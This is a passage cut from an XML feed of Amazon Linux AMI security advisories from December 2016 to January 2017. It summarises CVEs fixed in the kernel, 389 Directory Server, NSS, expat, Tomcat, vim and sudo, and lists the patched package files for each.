arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.121-2.6.8.1.69.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-772</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-772: important priority package update for kernel</title><issued date="2016-12-06 23:44:00" /><updated date="2016-12-07 19:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9084:
The use of a kzalloc with an integer multiplication allowed an integer overflow condition to be reached in vfio_pci_intrs.c. This combined with CVE-2016-9083 may allow an attacker to craft an attack and use unallocated memory, potentially crashing the machine.
1389259:
CVE-2016-9084 kernel: Integer overflow when using kzalloc in vfio driver
CVE-2016-9083:
A flaw was discovered in the Linux kernel&#039;s implementation of VFIO. An attacker issuing an ioctl can create a situation where memory is corrupted and modify memory outside of the expected area. This may overwrite kernel memory and subvert kernel execution.
1389258:
CVE-2016-9083 kernel: State machine confusion bug in vfio driver leading to memory corruption
CVE-2016-8655:
A race condition issue leading to a use-after-free flaw was found in the way the raw packet sockets implementation in the Linux kernel networking subsystem handled synchronization while creating the TPACKET_V3 ring buffer. A local user able to open a raw packet socket (requires the CAP_NET_RAW capability) could use this flaw to elevate their privileges on the system.
1400019:
CVE-2016-8655 kernel: Race condition in packet_set_ring leads to use after free
CVE-2016-8645:
It was discovered that the Linux kernel since 3.6-rc1 with &#039;net.ipv4.tcp_fastopen&#039; set to 1 can hit BUG() statement in tcp_collapse() function after making a number of certain syscalls leading to a possible system crash.
1393904:
CVE-2016-8645 kernel: a BUG() statement can be hit in net/ipv4/tcp_input.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8645" title="" id="CVE-2016-8645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655" title="" id="CVE-2016-8655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9083" title="" id="CVE-2016-9083" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9084" title="" id="CVE-2016-9084" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.35-33.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.35" release="33.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.35-33.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.35" release="33.55.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.35-33.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-773</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-773: medium priority package update for 389-ds-base</title><issued date="2016-12-15 00:28:00" /><updated date="2016-12-15 23:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5416:
It was found that 389 Directory Server was vulnerable to a flaw in which the default ACI (Access Control Instructions) could be read by an anonymous user. This could lead to leakage of sensitive information.
1349540:
CVE-2016-5416 389-ds-base: ACI readable by anonymous user
CVE-2016-5405:
It was found that 389 Directory Server was vulnerable to a remote password disclosure via timing attack. A remote attacker could possibly use this flaw to retrieve directory server password after many tries.
1358865:
CVE-2016-5405 389-ds-base: Password verification vulnerable to timing attack
CVE-2016-4992:
An information disclosure flaw was found in 389 Directory Server. A user with no access to objects in certain LDAP sub-tree could send LDAP ADD operations with a specific object name. The error message returned to the user was different based on whether the target object existed or not.
1347760:
CVE-2016-4992 389-ds-base: Information disclosure via repeated use of LDAP ADD operation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4992" title="" id="CVE-2016-4992" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5405" title="" id="CVE-2016-5405" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5416" title="" id="CVE-2016-5416" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.5.10-11.49.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.5.10-11.49.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.5.10" release="11.49.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.5.10-11.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-774</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-774: medium priority package update for nss-util nss nss-softokn</title><issued date="2016-12-15 00:32:00" /><updated date="2016-12-15 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8635:
It was found that Diffie Hellman Client key exchange handling in NSS was vulnerable to small subgroup confinement attack. An attacker could use this flaw to recover private keys by confining the client DH key to small subgroup of the desired group.
1391818:
CVE-2016-8635 nss: small-subgroups attack flaw
CVE-2016-5285:
A NULL pointer dereference flaw was found in the way NSS handled invalid Diffie-Hellman keys. A remote client could use this flaw to crash a TLS/SSL server using NSS.
1383883:
CVE-2016-5285 nss: Missing NULL check in PK11_SignWithSymKey / ssl3_ComputeRecordMACConstantTime causes server crash
CVE-2016-2834:
Multiple buffer handling flaws were found in the way NSS handled cryptographic data from the network. A remote attacker could use these flaws to crash an application using NSS or, possibly, execute arbitrary code with the permission of the user running the application.
1347908:
CVE-2016-2834 nss: Multiple security flaws (MFSA 2016-61)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2834" title="" id="CVE-2016-2834" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5285" title="" id="CVE-2016-5285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8635" title="" id="CVE-2016-8635" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.21.3-1.1.51.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.21.3-1.1.51.amzn1.x86_64.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.21.3-1.1.51.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.21.3-1.1.51.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.21.3-1.1.51.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.21.3" release="1.1.51.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.21.3-1.1.51.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.21.3" release="2.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.21.3-2.77.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss" version="3.21.3" release="2.77.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.21.3-2.77.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.16.2.3-14.4.39.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.16.2.3" release="14.4.39.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.16.2.3-14.4.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-775</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-775: medium priority package update for expat</title><issued date="2016-12-15 00:38:00" /><updated date="2016-12-15 23:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-0718:
* An out-of-bounds read flaw was found in the way Expat processed certain input. A remote attacker could send specially crafted XML that, when parsed by an application using the Expat library, would cause that application to crash or, possibly, execute arbitrary code with the permission of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0718" title="" id="CVE-2016-0718" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2016:2824.html" title="" id="RHSA-2016:2824" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="expat-debuginfo" version="2.1.0" release="10.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-debuginfo-2.1.0-10.21.amzn1.x86_64.rpm</filename></package><package name="expat-devel" version="2.1.0" release="10.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-devel-2.1.0-10.21.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="10.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/expat-2.1.0-10.21.amzn1.x86_64.rpm</filename></package><package name="expat" version="2.1.0" release="10.21.amzn1" epoch="0" arch="i686"><filename>Packages/expat-2.1.0-10.21.amzn1.i686.rpm</filename></package><package name="expat-devel" version="2.1.0" release="10.21.amzn1" epoch="0" arch="i686"><filename>Packages/expat-devel-2.1.0-10.21.amzn1.i686.rpm</filename></package><package name="expat-debuginfo" version="2.1.0" release="10.21.amzn1" epoch="0" arch="i686"><filename>Packages/expat-debuginfo-2.1.0-10.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-776</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-776: important priority package update for tomcat6</title><issued date="2016-12-15 00:41:00" /><updated date="2016-12-15 23:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8735:
1397485:
CVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener
CVE-2016-6816:
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735" title="" id="CVE-2016-8735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat6-admin-webapps" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-admin-webapps-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-el-2.1-api" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-el-2.1-api-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-servlet-2.5-api" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-servlet-2.5-api-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-javadoc" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-javadoc-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-jsp-2.1-api" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-jsp-2.1-api-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-webapps" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-webapps-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-docs-webapp" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-docs-webapp-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6-lib" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-lib-6.0.48-1.8.amzn1.noarch.rpm</filename></package><package name="tomcat6" version="6.0.48" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat6-6.0.48-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-777</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-777: important priority package update for tomcat7</title><issued date="2016-12-15 00:48:00" /><updated date="2016-12-15 23:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8735:
1397485:
CVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener
CVE-2016-6816:
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735" title="" id="CVE-2016-8735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.73-1.23.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.73" release="1.23.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.73-1.23.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-778</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-778: important priority package update for tomcat8</title><issued date="2016-12-15 00:50:00" /><updated date="2016-12-15 23:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-8735:
1397485:
CVE-2016-8735 tomcat: Remote code execution vulnerability in JmxRemoteLifecycleListener
CVE-2016-6816:
1397484:
CVE-2016-6816 tomcat: HTTP Request smuggling vulnerability due to permitting invalid character in HTTP requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6816" title="" id="CVE-2016-6816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8735" title="" id="CVE-2016-8735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-el-3.0-api" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.0.39-1.67.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.0.39" release="1.67.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.0.39-1.67.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-779</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-779: important priority package update for vim</title><issued date="2016-12-19 16:30:00" /><updated date="2016-12-19 16:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1248:
A vulnerability was found in vim in how certain modeline options were treated. An attacker could craft a file that, when opened in vim with modelines enabled, could execute arbitrary commands with privileges of the user running vim.
1398227:
CVE-2016-1248 vim: Lack of validation of values for few options results in code exection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1248" title="" id="CVE-2016-1248" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0134-1.43.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-filesystem" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-filesystem-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-debuginfo-8.0.0134-1.43.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0134" release="1.43.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0134-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-780</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-780: medium priority package update for sudo</title><issued date="2017-01-04 17:00:00" /><updated date="2017-01-04 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7076:
It was discovered that the sudo noexec restriction could have been bypassed if application run via sudo executed wordexp() C library function with a user supplied argument. A local user permitted to run such application via sudo with noexec restriction could possibly use this flaw to execute arbitrary commands with elevated privileges.
1384982:
CVE-2016-7076 sudo: noexec bypass via wordexp()
CVE-2016-7032:
